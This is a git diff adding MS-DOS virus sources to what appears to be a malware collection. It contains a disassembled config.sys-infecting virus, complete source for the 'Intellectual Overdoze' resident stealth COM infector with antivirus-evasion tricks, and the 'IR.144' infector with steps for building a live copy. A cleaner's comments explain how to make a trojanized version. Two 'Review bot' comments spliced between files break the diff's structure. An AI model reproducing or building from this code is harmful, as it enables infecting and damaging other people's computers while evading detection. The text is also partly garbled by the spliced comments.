+0b59:01ef a5 movs
+0b59:01f0 b9 0a 00 mov cx,000a
+0b59:01f3 83 f9 03 cmp cx,03
+0b59:01f6 75 02 jnz 01fa
+0b59:01f8 8b ef mov bp,di
+0b59:01fa d1 ea shr dx,1
+0b59:01fc 73 04 jae 0202
+0b59:01fe c6 05 90 mov byte [di],90
+0b59:0201 47 inc di
+0b59:0202 a5 movsw
+0b59:0203 e2 ee loop 01f3
+0b59:0205 b0 e2 mov al,e2
+0b59:0207 aa stosb
+0b59:0208 2b ef sub bp,di
+0b59:020a 4d dec bp
+0b59:020b 8b c5 mov ax,bp
+0b59:020d aa stosb
+0b59:020e b0 e9 mov al,e9
+0b59:0210 aa stosb
+0b59:0211 b8 a0 02 mov ax,02a0
+0b59:0214 2b c7 sub ax,di
+0b59:0216 05 88 05 add ax,0588
+0b59:0219 ab stosw
+0b59:021a b8 4a 4c mov ax,4c4a
+0b59:021d 33 06 9d 02 xor ax,[029d]
+0b59:0221 89 05 mov [di],ax
+0b59:0223 83 c7 02 add di,02
+0b59:0226 81 ef 88 05 sub di,0588
+0b59:022a 8b cf mov cx,di
+0b59:022c ba 88 05 mov dx,0588
+0b59:022f b4 40 mov ah,40
+0b59:0231 cd 21 int 21
+0b59:0233 72 59 jb 028e
+0b59:0235 01 06 6e 05 add [056e],ax
+0b59:0239 83 16 6c 05 00 adc word [056c],00
+0b59:023e 8b 16 6c 05 mov dx,[056c]
+0b59:0242 a1 6e 05 mov ax,[056e]
+0b59:0245 8a f2 mov dh,dl
+0b59:0247 8a d4 mov dl,ah
+0b59:0249 d1 ea shr dx,1
+0b59:024b b4 00 mov ah,00
+0b59:024d d0 d4 rcl ah,1
+0b59:024f 42 inc dx
+0b59:0250 89 16 74 05 mov [0574],dx
+0b59:0254 a3 72 05 mov [0572],ax
+0b59:0257 8b 16 6c 05 mov dx,[056c]
+0b59:025b a1 6e 05 mov ax,[056e]
+0b59:025e b9 04 00 mov cx,0004
+
+0b59:0261 d1 ea shr dx,1
+0b59:0263 d1 d8 rcr ax,1
+0b59:0265 e2 fa loop 0261
+
+0b59:0267 2b 06 78 05 sub ax,[0578]
+0b59:026b 29 06 7a 05 sub [057a],ax
+0b59:026f 73 06 jae 0277
+0b59:0271 c7 06 7a 05 00 00 mov word [057a],0000
+0b59:0277 b9 00 00 mov cx,0000
+0b59:027a ba 00 00 mov dx,0000
+0b59:027d b8 00 42 mov ax,4200
+0b59:0280 cd 21 int 21
+0b59:0282 72 0a jb 028e
+0b59:0284 b9 18 00 mov cx,0018
+0b59:0287 ba 70 05 mov dx,0570
+0b59:028a b4 40 mov ah,40
+0b59:028c cd 21 int 21
+
+0b59:028e b4 3e mov ah,3e
+0b59:0290 cd 21 int 21
+0b59:0292 07 pop es
+0b59:0293 1f pop ds
+0b59:0294 5a pop dx
+0b59:0295 5b pop bx
+0b59:0296 58 pop ax
+
+ORIGINAL_21h:
+
+0b59:0297 ea eb 40 19 00 jmp 0019:40eb
+
+0b59:029c ba c4 68 mov dx,68c4
+0b59:029f b9 ac 02 mov cx,02ac
+0b59:02a2 8c dd mov bp,ds
+0b59:02a4 8c c8 mov ax,cs
+0b59:02a6 8e d8 mov ds,ax
+0b59:02a8 8e c0 mov es,ax
+0b59:02aa 33 f6 xor si,si
+0b59:02ac 8b fe mov di,si
+
+0b59:02ae fc cld
+0b59:02af 90 nop
+0b59:02b0 ad lodsw
+0b59:02b1 90 nop
+0b59:02b2 33 c2 xor ax,dx
+0b59:02b4 ab stosw
+0b59:02b5 90 nop
+0b59:02b6 8e dd mov ds,bp
+0b59:02b8 be 80 00 mov si,0080
+0b59:02bb bf 66 05 mov di,0566
+0b59:02be b9 40 00 mov cx,0040
+0b59:02c1 f3 repz
+0b59:02c2 a5 movsw
+0b59:02c3 8c c0 mov ax,es
+0b59:02c5 8e d8 mov ds,ax
+0b59:02c7 8b c5 mov ax,bp
+0b59:02c9 05 10 00 add ax,0010
+0b59:02cc 01 06 92 04 add [0492],ax
+0b59:02d0 01 06 87 04 add [0487],ax
+
+; Hook INT 21h
+
+0b59:02d4 b8 00 00 mov ax,0000
+0b59:02d7 8e d8 mov ds,ax
+0b59:02d9 c4 1e 84 00 les bx,[0084]
+0b59:02dd 81 fb b6 0c cmp bx,0cb6
+0b59:02e1 75 14 jnz
02f7
+0b59:02e3 26 80 3f 9c cmp byte es:[bx],9c
+0b59:02e7 75 0e jnz 02f7
+0b59:02e9 26 c4 06 c5 02 les ax,es:[02c5]
+0b59:02ee fa cli
+0b59:02ef a3 84 00 mov [0084],ax
+0b59:02f2 8c 06 86 00 mov [0086],es
+0b59:02f6 fb sti
+
+0b59:02f7 8c c8 mov ax,cs
+0b59:02f9 8e d8 mov ds,ax
+0b59:02fb 8e c0 mov es,ax
+0b59:02fd b8 00 3d mov ax,3d00
+0b59:0300 ba 94 04 mov dx,0494
+0b59:0303 cd 21 int 21
+0b59:0305 72 79 jb 0380
+0b59:0307 8b d8 mov bx,ax
+0b59:0309 ba f0 06 mov dx,06f0
+0b59:030c b9 00 04 mov cx,0400
+0b59:030f b4 3f mov ah,3f
+0b59:0311 cd 21 int 21
+0b59:0313 72 6e jb 0383
+0b59:0315 8b c8 mov cx,ax
+0b59:0317 a3 78 05 mov [0578],ax
+0b59:031a be f0 06 mov si,06f0
+
+
+0b59:031d ac lodsb
+0b59:031e 3c 44 cmp al,44 ; 'D'
+0b59:0320 74 06 jz 0328
+0b59:0322 3c 64 cmp al,64 ; 'd'
+0b59:0324 e0 f7 loopnz 031d
+
+0b59:0326 e3 5e jcxz 0386
+
+0b59:0328 bf a2 04 mov di,04a2
+
+0b59:032b ac lodsb
+0b59:032c 3c 61 cmp al,61 ; 'a'
+0b59:032e 72 02 jb 0332
+0b59:0330 2c 20 sub al,20
+0b59:0332 ae scasb
+0b59:0333 e1 f6 loopz 032b
+0b59:0335 e3 4f jcxz 0386
+
+0b59:0337 81 ff a8 04 cmp di,04a8
+0b59:033b e0 e0 loopnz 031d
+0b59:033d 8b fe mov di,si
+0b59:033f 4f dec di
+0b59:0340 b0 3d mov al,3d
+0b59:0342 f2 repnz
+0b59:0343 ae scasb
+0b59:0344 b0 41 mov al,41
+0b59:0346 ae scasb
+0b59:0347 77 fd ja 0346
+0b59:0349 8b f7 mov si,di
+0b59:034b b0 20 mov al,20
+0b59:034d ae scasb
+0b59:034e 72 fd jb 034d
+0b59:0350 c6 45 ff 00 mov byte [-01+di],00
+0b59:0354 8b fe mov di,si
+0b59:0356 83 ef 04 sub di,04
+0b59:0359 80 3c 3a cmp byte [si],3a ; ':'
+0b59:035c 74 04 jz 0362
+0b59:035e 4e dec si
+0b59:035f eb 05 jmp 0366
+0b59:0361 90 nop
+
+0b59:0362 83 c7 02 add di,02
+0b59:0365 46 inc si
+0b59:0366 80 3c 5c cmp byte [si],5c ; '\'
+0b59:0369 75 01 jnz 036c
+0b59:036b 47 inc di
+
+0b59:036c 8b d7 mov dx,di
+0b59:036e be a8 04 mov si,04a8
+0b59:0371 b9 03 00 mov cx,0003
+0b59:0374 f3 repz
+0b59:0375 a4 movsb
+0b59:0376 b8 02 3d mov ax,3d02
+0b59:0379 cd 21 int 21
+0b59:037b 72
09 jb 0386
+0b59:037d e9 92 00 jmp 0412
+0b59:0380 e9 07 01 jmp 048a
+0b59:0383 e9 00 01 jmp 0486
+
+0b59:0386 b4 3e mov ah,3e
+0b59:0388 cd 21 int 21
+0b59:038a 72 f4 jb 0380
+0b59:038c b8 02 3d mov ax,3d02
+0b59:038f cd 21 int 21
+0b59:0391 72 ed jb 0380
+0b59:0393 8b d8 mov bx,ax
+0b59:0395 b4 3f mov ah,3f
+0b59:0397 b9 ff ff mov cx,ffff
+0b59:039a ba 02 07 mov dx,0702
+0b59:039d cd 21 int 21
+0b59:039f 72 e2 jb 0383
+0b59:03a1 bf f0 06 mov di,06f0
+0b59:03a4 be b5 04 mov si,04b5
+0b59:03a7 b9 12 00 mov cx,0012
+0b59:03aa f3 repz
+0b59:03ab a4 movsb
+0b59:03ac b8 00 42 mov ax,4200
+0b59:03af b9 00 00 mov cx,0000
+0b59:03b2 ba 00 00 mov dx,0000
+0b59:03b5 cd 21 int 21
+0b59:03b7 72 ca jb 0383
+0b59:03b9 8b 0e 78 05 mov cx,[0578]
+0b59:03bd 83 c1 12 add cx,12
+0b59:03c0 90 nop
+0b59:03c1 ba f0 06 mov dx,06f0
+0b59:03c4 b4 40 mov ah,40
+0b59:03c6 cd 21 int 21
+0b59:03c8 72 b9 jb 0383
+0b59:03ca b4 3e mov ah,3e
+0b59:03cc cd 21 int 21
+0b59:03ce 72 b0 jb 0380
+0b59:03d0 b8 13 80 mov ax,8013
+0b59:03d3 a3 52 05 mov [0552],ax
+0b59:03d6 b8 14 00 mov ax,0014
+0b59:03d9 a3 ff 04 mov [04ff],ax
+0b59:03dc b8 23 00 mov ax,0023
+0b59:03df a3 04 05 mov [0504],ax
+0b59:03e2 b9 04 00 mov cx,0004
+0b59:03e5 be c8 04 mov si,04c8
+0b59:03e8 bf 58 05 mov di,0558
+0b59:03eb f3 repz
+0b59:03ec a5 movs
+0b59:03ed be d0 04 mov si,04d0
+0b59:03f0 bf 04 07 mov di,0704
+0b59:03f3 b9 21 00 mov cx,0021
+0b59:03f6 f3 repz
+0b59:03f7 a5 movs
+0b59:03f8 b4 3c mov ah,3c
+0b59:03fa b9 02 00 mov cx,0002
+0b59:03fd ba a8 04 mov dx,04a8
+0b59:0400 cd 21 int 21
+0b59:0402 73 03 jae 0407
+0b59:0404 e9 83 00 jmp 048a
+0b59:0407 8b d8 mov bx,ax
+0b59:0409 c7 06 62 05 42
+ 00 mov word [0562],0042
+0b59:040f eb 4c jmp 045d
+0b59:0411 90 nop
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+0b59:0412 8b c8 mov cx,ax
+0b59:0414 b4 3e mov ah,3e
+0b59:0416 cd 21 int 21
+0b59:0418 8b d9 mov bx,cx
+0b59:041a 72 6a jb 0486
+0b59:041c ba f0 06 mov dx,06f0
+0b59:041f b9 ff ff mov
cx,ffff
+0b59:0422 b4 3f mov ah,3f
+0b59:0424 cd 21 int 21
+0b59:0426 72 5e jb 0486
+0b59:0428 a3 62 05 mov [0562],ax
+0b59:042b a1 02 07 mov ax,[0702]
+0b59:042e 3d 4a 4c cmp ax,4c4a
+0b59:0431 74 53 jz 0486
+0b59:0433 a1 f6 06 mov ax,[06f6]
+0b59:0436 a3 ff 04 mov [04ff],ax
+0b59:0439 a1 f8 06 mov ax,[06f8]
+0b59:043c a3 04 05 mov [0504],ax
+0b59:043f a1 f4 06 mov ax,[06f4]
+0b59:0442 a3 52 05 mov [0552],ax
+0b59:0445 b9 04 00 mov cx,0004
+0b59:0448 be fa 06 mov si,06fa
+0b59:044b bf 58 05 mov di,0558
+0b59:044e f3 repz
+0b59:044f a5 movs
+0b59:0450 b9 00 00 mov cx,0000
+0b59:0453 ba 00 00 mov dx,0000
+0b59:0456 b8 00 42 mov ax,4200
+0b59:0459 cd 21 int 21
+0b59:045b 72 29 jb 0486
+0b59:045d c7 06 60 05 4a 4c mov word [0560],4c4a
+0b59:0463 b9 14 00 mov cx,0014
+0b59:0466 ba 4e 05 mov dx,054e
+0b59:0469 b4 40 mov ah,40
+0b59:046b cd 21 int 21
+0b59:046d 72 17 jb 0486
+0b59:046f ba 00 00 mov dx,0000
+0b59:0472 b9 fc 0a mov cx,0afc
+0b59:0475 b4 40 mov ah,40
+0b59:0477 cd 21 int 21
+0b59:0479 72 0b jb 0486
+0b59:047b 8b 0e 62 05 mov cx,[0562]
+0b59:047f ba f0 06 mov dx,06f0
+0b59:0482 b4 40 mov ah,40
+0b59:0484 cd 21 int 21
+0b59:0486 b4 3e mov ah,3e
+0b59:0488 cd 21 int 21
+
+0b59:048a 8e c5 mov es,bp
+0b59:048c bf 80 00 mov di,0080
+0b59:048f be 66 05 mov si,0566
+0b59:0492 b9 40 00 mov cx,0040
+0b59:0495 f3 repz
+0b59:0496 a5 movs
+0b59:0497 8e dd mov ds,bp
+0b59:0499 fa cli
+0b59:049a b8 a0 0d mov ax,0da0
+0b59:049d 8e d0 mov ss,ax
+0b59:049f bc 10 bf mov sp,bf10
+0b59:04a2 fb sti
+0b59:04a3 ea 00 00 00 00 jmp 0000:0000
+
+0b59:04a8 63 3a 5c 63 6f 6e 66 69 |c:\confi|
+0b59:04b0 67 2e 73 79 73 00 45 56 |g.sys.EV|
+0b59:04b8 49 43 45 00 43 3a 5c 76 |ICE.C:\v|
+0b59:04c0 61 6e 73 69 2e 73 79 73 |ansi.sys|
+0b59:04c8 00 64 65 76 69 63 65 3d |.device=|
+0b59:04d0 76 61 6e 73 69 2e 73 79 |vansi.sy|
+0b59:04d8 73 0d 0a 90 76 61 6e 73 |s...vans|
+0b59:04e0 69 20 20 20 |i |
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+STRAT:
+
+0b59:04e4
2e 89 1e 1f 00 mov cs:[001f],bx
+0b59:04e9 2e 8c 06 21 00 mov cs:[0021],es
+0b59:04ee cb retf
+
+0b59:04ef 00 00 add [bx+si],al
+0b59:04f1 00 00 add [bx+si],al
+
+0b59:04f3 53 push bx
+0b59:04f4 06 push es
+0b59:04f5 2e 8b 1e 1f 00 mov bx,cs:[001f]
+0b59:04fa 2e 8e 06 21 00 mov es,cs:[0021]
+0b59:04ff 26 c7 47 03 00 00 mov word es:[03+bx],0000
+0b59:0505 26 c7 47 0e 42 00 mov word es:[0e+bx],0042
+0b59:050b 26 8c 4f 10 mov es:[10+bx],cs
+0b59:050f 07 pop es
+0b59:0510 5b pop bx
+0b59:0511 cb retf
+
+0b59:0512 ea c1 00 0a 0c jmp 0c0a:00c1
+0b59:0517 ea cc 00 0a 0c jmp 0c0a:00cc
+
+0b59:051c 50 push ax
+0b59:051d 8c c8 mov ax,cs
+0b59:051f 05 b1 00 add ax,00b1
+0b59:0522 2e a3 15 05 mov cs:[0515],ax
+0b59:0526 2e a3 1a 05 mov cs:[051a],ax
+0b59:052a b8 12 05 mov ax,0512
+0b59:052d 2e a3 06 00 mov cs:[0006],ax
+0b59:0531 58 pop ax
+0b59:0532 eb de jmp 0512
+
+0b59:0534 50 push ax
+0b59:0535 53 push bx
+0b59:0536 1e push ds
+0b59:0537 fa cli
+0b59:0538 b8 00 00 mov ax,0000
+0b59:053b 8e d8 mov ds,ax
+0b59:053d bb 84 00 mov bx,0084
+0b59:0540 8b 07 mov ax,[bx]
+0b59:0542 2e a3 98 02 mov cs:[0298],ax
+0b59:0546 8b 47 02 mov ax,[02+bx]
+0b59:0549 2e a3 9a 02 mov cs:[029a],ax
+0b59:054d b8 14 00 mov ax,0014
+0b59:0550 89 07 mov [bx],ax
+0b59:0552 8c 4f 02 mov [02+bx],cs
+0b59:0555 b8 17 05 mov ax,0517
+0b59:0558 2e a3 08 00 mov cs:[0008],ax
+0b59:055c fb sti
+0b59:055d 1f pop ds
+0b59:055e 5b pop bx
+0b59:055f 58 pop ax
+0b59:0560 eb b5 jmp 0517
+
+DEV_HDR:
+
+0b59:0562 ff ????
+0b59:0563 ff ????
+0b59:0564 ff ????
+0b59:0565 ff
+ 53 c0
+0b59:0568 1c 05
+0b59:056a 34 05
+0b59:056c 01 00
+0b59:056e 7c 2d
+0b59:0570 4d
+0b59:0571 5a
diff --git a/MSDOS/Virus.MSDOS.Unknown.iod.asm b/MSDOS/Virus.MSDOS.Unknown.iod.asm
new file mode 100644
index 00000000..1c4956c0
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.iod.asm
@@ -0,0 +1,350 @@ +; ------------------------------------------------------------------------------ +; +; - Intellectual Overdoze - +; Created by Immortal Riot's destructive development team +; (c) 1994 The Unforgiven/Immortal Riot +; +;------------------------------------------------------------------------------- +; þ Memory Resident Stealth Infector of COM-programs þ +;------------------------------------------------------------------------------- + .model tiny + .code + org 100h + +start: + + jmp virus_start ; for first generation only! + db 'V' ; mark org file infected + +virus_start: + + mov sp,102h ; get delta offset without + call get_delta_offset ; getting detected by tbscan + + +get_delta_offset: + + call cheat_tbscan ; kick's tbscan's heuristics + mov si,word ptr ds:[100h] ; real bad! + mov sp,0fffeh + sub si,offset get_delta_offset + jmp short go_resident + +cheat_tbscan: + + mov ax,0305h ; keyb i/o + xor bx,bx + int 16h + ret + +go_resident: + + mov bp,si + +installtion_check: + + mov ax,6666h + int 21h + cmp bx,6666h ; 6666h returned in bx? + je already_resident ; = assume resident + + push cs + pop ds + +resize_memory_block: + + mov ah,4ah ; find top of memory + mov bx,0ffffh ; (65536) + int 21h + +resize_memory_block_for_virus: + + sub bx,(virus_end-virus_start+15)/16+1 ; resize enough para's + mov ah,4ah ; for virus + int 21h + +allocate_memory_block_for_virus: + + mov ah,48h ; allocate for virus + mov bx,(virus_end-virus_start+15)/16 + int 21h + jc not_enough_mem ; not enough memory! 
+ + dec ax ; ax - 1 = mcb + push es + +mark_allocated_memory_block_to_dos: + + mov es,ax + mov byte ptr es:[0],'Z' + mov word ptr es:[1],8 ; dos = mcb owner + inc ax + +copy_virus_to_memory: + + cld ; clear direction for movsw + lea si,[bp+offset virus_start] ; vir start + mov es,ax + xor di,di + mov cx,(virus_end-virus_start+4)/2 ; vir len + rep movsw + +manually_hook_of_int21h: + + xor ax,ax + mov ds,ax + push ds + ; get/set int vector for int21 + lds ax,ds:[21h*4] + mov word ptr es:[oldint21h-virus_start],ax + mov word ptr es:[oldint21h-virus_start+2],ds + pop ds + mov word ptr ds:[21h*4],(newint21h-virus_start) + + mov bx,es ; cheat tbscan since + mov ds:[21h*4+2],bx ; mov ds:[21h*4+2],es = M flag + + push cs + pop ds + +exit: +not_enough_mem: +already_resident: + + push cs + pop es + +restore_first_bytes: + + mov di,100h + mov cx,4 + mov si,offset orgbuf + add si,bp ; fix correct offset (delta) + repne movsb + +jmp_org_program: + + mov ax,101h ; cheats tbscan's back to + dec ax ; entry point + jmp ax + + +newint21h: + + cmp ax,4b00h ; file executed? + je infect + + cmp ah,11h ; fcb findfirst call? + je fcb_stealth + + cmp ah,12h ; fcb findnext call? + je fcb_stealth + + cmp ax,6666h ; residency check + jne do_old21h ; not resident + mov bx,6666h ; return marker in bx + +do_old21h: + + jmp dword ptr cs:[(oldint21h-virus_start)] ; jmp ssss:oooo + ret + +fcb_stealth: + + pushf + push cs ; fake a int call with pushf + call do_old21h ; and cs, ip on the stack + cmp al,00 ; dir successfull? + jnz dir_error ; naw, skip stealth routine! + push ax + push bx + push es + mov ah,51h ; Get active PSP to es:bx + int 21h + mov es,bx + cmp bx,es:[16h] ; Dos calling it? + jnz not_dos ; Nope! + mov bx,dx + mov al,[bx] ; al = current drive + push ax + mov ah,2fh ; get dta area + int 21h + pop ax ; check extended fcb + inc al ; "cmp byte ptr [bx],0ffh" + jnz normal_fcb ; nope, regular fcb! 
+ +ext_fcb: + add bx,7h ; skip junkie if ext fcb + +normal_fcb: + + mov ax,es:[bx+17h] ; get second value + and ax,1fh + xor al,01h + jnz no_stealth ; second-stealth value match + +; Here one should really check (i) if the file was a comfile, and (ii), +; the file-size ( >472 bytes) But oh well, maybe to come.. + + and byte ptr es:[bx+17h],0e0h ; substract virus len + sub es:[bx+1dh],(virus_end-virus_start) + sbb es:[bx+1fh],ax + +no_stealth: +not_dos: + + pop es + pop bx + pop ax + +dir_error: + iret + +infect: + + push ax + push bx + push cx + push dx + push di + push si + push ds + push es + +open_file: + + mov ax,3d02h ; open file in read/write + int 21h ; mode + jc error_open ; error on file open + + xchg ax,bx ; file handle in bx + + push ds + push cs + pop ds + +read_firstbytes: + + mov ah,3fh ; read first four bytes + mov dx,(orgbuf-virus_start) ; to orgbuf + mov cx,4 + int 21h + + +check_file_executed: + + cmp byte ptr cs:[(orgbuf-virus_start)],'M' ; check only first byte + je exe_file ; - fooling tbscan + + +check_previous_infection: + + cmp byte ptr cs:[(orgbuf-virus_start)+3],'V' ; already infected? 
+ je already_infected + + jmp short get_file_time_date ; not infected + +error_open: +already_infected: +exe_file: + + + jmp exit_proc ; dont infect file + + +get_file_time_date: + + mov ax,5700h ; get time/date + int 21h + + mov word ptr cs:[(old_time-virus_start)],cx ; save time + mov word ptr cs:[(old_date-virus_start)],dx ; and date + +go_endoffile: + + mov ax,4202h ; go end of file + xor cx,cx + cwd + int 21h + +check_file_size: + + cmp ax,3072d ; check file-size + jb too_small + + cmp ax,64000d + ja too_big + +create_newjump: + + sub ax,3 ; 0e9h,XX,XX, + mov word ptr cs:[(newbuf+1-virus_start)],ax ; V => AX + +write_virus: + + mov ah,40h ; write virus to end of file + mov cx,(virus_end-virus_start) +; cwd ; (dx = 0 since go eof) + int 21h + +go_tof: + + mov ax,4200h + xor cx,cx +; cwd ; ( dx = 0 since go eof) + int 21h + + +write_newjump: + + mov ah,40h ; write new jmp to tof + mov cx,4 ; = 0E9H,XX,XX,V + mov dx,(newbuf-virus_start) ; offset to write from + int 21h + + +set_org_time_date: +too_small: +too_big: + + mov ax,5701h ; set back org + mov word ptr cx,cs:[(old_time-virus_start)] ; time + mov word ptr dx,cs:[(old_date-virus_start)] ; date + + +set_stealth_marker: + + and cl,0e0h ; give file + inc cl ; specific + int 21h ; second val + +close_file: + + mov ah,3eh ; close file + int 21h + +exit_proc: + + pop ds + pop es + pop ds + pop si + pop di + pop dx + pop cx + pop bx + pop ax + + jmp dword ptr cs:[(oldint21h-virus_start)] ; jmp ssss:oooo + +old_date dw 0 ; storage buffers +old_time dw 0 ; for file time/date +oldint21h dd ? ; and oldint21h + +orgbuf db 0cdh,20h,00,00 ; buffer to save first 4 bytes in +newbuf db 0E9h,00,00,'V' ; buffer to calculate a new entry + +copyrt db "[Overdoze] (c) 1994 The Unforgiven/Immortal Riot" + +virus_end: + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.ir144.asm b/MSDOS/Virus.MSDOS.Unknown.ir144.asm new file mode 100644 index 00000000..0ad57549 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.ir144.asm 
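Review bot: The three infection markers an analyst needs to recognise this sample are never summarised, although each is visible in the hunk: the byte `'V'` at host offset 3 (`newbuf db 0E9h,00,00,'V'`, tested at `check_previous_infection`), a file-time seconds field forced to 1 (`and cl,0e0h` / `inc cl` before the `5701h` call, matched by `and ax,1fh` / `xor al,01h` in `normal_fcb`), and the residency handshake `ax=6666h` answered with `bx=6666h`. A header comment such as `; Markers: 'V' at host offset 3; file time seconds field (low 5 bits) == 1; int 21h ax=6666h returns bx=6666h` would save re-deriving them. It is also worth recording in the `fcb_stealth` comment that only the FCB directory calls (`ah=11h`/`12h`) are filtered, so handle-based `4Eh`/`4Fh` searches still report the true size.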
@@ -0,0 +1,123 @@ +; Virusname: IR.144 +; Origin : Sweden +; Author : Metal Militia/Immortal Riot +; +; Ok, this is not one of the very tiny viruses out there today, but to +; date this is the smallest one I've ever made and since I never really +; care about size when I write my creations I think thisone's pretty ok. +; There are others out there on about 100 bytes that does the same, but +; who gives a shit? If you don't like thisone, take a look at my +; "fixed-up" version [UNIQ], also included in this issue of Insane +; Reality. +; +; In order to get thisone working it needs a host, so create the +; following bytes of code and then do a "copy /b dummy.com+ir144.com +; ready.com" and woha! A very working copy. +; +; ----------------------- +; .model tiny ; DUMMY.ASM +; .code +; org 100h +; +; sov: +; +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; xchg ax,ax ; nop +; +; end sov +; ----------------------- +.model tiny ; IR144.ASM +.radix 16 +.code + org 100 +start: + call get_offset + +get_offset: + pop bp ; get the + sub bp,offset get_offset ; delta offset + + lea si,[buffa_bytes+bp] ; restore our + mov di,100 ; first four + movsw ; bytes + movsw + + lea dx,[end_virus+bp] ; set the + mov ah,1a ; DTA to eov + int 21 + + lea dx,[find_files+bp] ; matching "*.com" + mov ah,4e ; find first +find_next: + int 21 + jc reset_DTA + + lea dx,[end_virus+1e+bp] + mov ax,3d02 ; open it + int 21 + + jc get_more + + xchg bx,ax + + mov cx,4 ; first four bytes + mov ah,3f ; read em + lea dx,[buffa_bytes+bp] ; and put them in + int 21 ; our buffer + + cmp byte ptr [buffa_bytes+bp+3],'V' ; check if already + jz close_em ; infected + + mov ax,4202 ; goto EOF + sub cx,cx + cwd + int 21 + + sub ax,3 + mov word ptr [bp+jump_bytes+1],ax ; use our 'jmp' bytes + + mov ah,40 ; write our + mov cx,end_virus-start ; viral code + lea dx,[bp+start] ; to victim file + int 21 + + mov ax,4200 ; goto SOF + sub cx,cx + cwd + int 21 + + mov ah,40 ; write our + mov cx,4 ; first four + 
lea dx,[bp+jump_bytes] ; bytes over + int 21 ; the original + +close_em: + mov ah,3e ; close file + int 21 + +get_more: + mov ah,4f ; find next + jmp find_next + +reset_DTA: + mov dx,80 ; reset the DTA + mov ah,1a + int 21 + + mov di,100 ; and return + push di ; to the original + ret ; program + + +find_files db '*.com',0 ; victim files +jump_bytes db 0e9,0,0,'V' ; our 'jmp' bytes + +buffa_bytes: ; the original first four bytes will be put here + xchg ax,ax ; nop + xchg ax,ax ; nop + int 20 ; ret(urn) to prompt + +end_virus: +end start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm b/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm new file mode 100644 index 00000000..6a68633f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.irm_kill.asm 
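Review bot: `.radix 16` makes every bare number in this file hexadecimal, so `mov di,100`, `mov dx,80` and `lea dx,[end_virus+1e+bp]` mean 100h, 80h and 1Eh, but nothing after the header says so and the host stub just above is written in the usual `100h` form; a comment on the directive, `; .radix 16: every bare immediate below is hex (100 = 100h, 80 = default DTA, 1e = DTA filename offset)`, would prevent misreading. The `1e` is worth naming because it is the filename field of the DTA that the `mov ah,1a` call has just relocated to `end_virus+bp`. The only infection check in the file is `cmp byte ptr [buffa_bytes+bp+3],'V'`, so a recogniser for this sample is a `*.com` in the current directory whose fourth byte is `'V'` behind an `E9` jump; the header could state that directly.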
@@ -0,0 +1,295 @@ +; Binary Obsession Cleaner +; - By Ratman - + + +data_18e equ 9CDh ;* +data_19e equ 4F43h ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +irm_kill proc far + +start: + + mov ah,9 + mov dx,offset data_1 ; ('IR Multi-Partite Virus K') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +;====( Here is the program's self-check routine )==============================; + + cmp word ptr ds:data_18e,3E8h + jne loc_1 + +; jmp short loc_1 ; 'Crack it' + +; If you want it 'cracked', exchange the jne loc_1 to "jmp short loc_1" and +; voila!.. Program run like it wasn't modified.. All trivia really, and +; very usuful if one want a trojanized version of this program :). + + mov ah,9 + mov dx,offset data_6 ; ('Scanner fails Self-Check') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + int 20h ; DOS program terminate + +loc_1: + mov ax,201h + mov bx,offset data_15 + mov cx,1 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + cmp data_15,3E8h + jne loc_2 ; Jump if not equal + mov ah,9 + mov dx,offset data_2 ; ('Warning!: IR MultiPartit') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ah,0 + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + cmp ah,15h + jne loc_2 ; Jump if not equal + mov ax,201h + mov bx,offset data_15 + mov cx,2 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + mov ax,301h + mov bx,offset data_15 + mov cx,1 + mov dx,80h + int 13h ; Disk dl=drive 0 ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + mov ah,9 + mov dx,offset data_4 ; ('Drive C: MBR is now Clea') + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx +loc_2: + mov ah,9 + mov dx,offset data_5 ; ('Scanning the files in th') + int 21h ; DOS Services ah=function 
09h + ; display char string at ds:dx + mov ah,2Fh + int 21h ; DOS Services ah=function 2Fh + ; get DTA ptr into es:bx + mov ah,4Eh + mov cx,7 + mov dx,586h + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + jc loc_4 ; Jump if carry Set +loc_3: + call sub_1 + mov ah,4Fh + int 21h ; DOS Services ah=function 4Fh + ; find next filename match + jnc loc_3 ; Jump if carry=0 +loc_4: + jmp short $+3 ; delay for I/O + nop + int 20h ; DOS program terminate + +irm_kill endp + +sub_1 proc near + push ax + push bx + push cx + push dx + push di + push si + push es + push es + pop ds + push cs + pop es + mov si,bx + add si,1Eh + mov di,58Ch + mov cx,0Fh + push cx + push di + rep movsb + pop di + pop cx + xor al,al + cld + repne scasb + mov al,20h + rep stosb + mov byte ptr es:[di],24h ; '$' + pop es + push cs + pop ds + mov ah,9 + mov dx,58Ch + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + mov ax,3D02h + mov dx,bx + add dx,1Eh + push es + pop ds + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + mov bx,ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + xor cx,cx ; Zero register + mov dx,ax + sub dx,1B9h ; EOF-441 + mov ax,4200h + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,3Fh + mov 